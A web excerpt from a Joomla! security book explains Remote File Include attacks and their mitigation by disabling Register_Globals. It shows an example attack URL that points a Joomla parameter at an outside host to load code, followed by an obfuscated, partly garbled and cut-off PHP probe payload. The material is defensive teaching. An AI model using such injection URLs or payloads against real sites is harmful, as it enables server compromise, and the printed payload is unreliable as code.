Book Image

Joomla! Web Security

Book Image

Joomla! Web Security

Overview of this book

Table of Contents (16 chapters)
Joomla! Web Security
Credits
About the Author
About the Reviewer
Preface

Remote File Includes


An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code.

Note

It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.

Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion.

The following is a sanitized attempt to attack a server in just such a manner:

http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i?

If the site in this example did not have appropriate safeguards in place, the following code would be executed:

$x0b="in\x72_\147\x65\x74"; $x0c="\184r\x74o\154\x6fwe\x72";
RFIcode, executingecho "c\162\141\156k\x5fr\157c\x6bs"; if (@$x0b("\222\x61\x33e_\x6d\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e") { echo "\345a\146\x65\155od\145\x3ao\156"; } else { echo "\345a\146e\x6do\x64e:\x6ff\x66...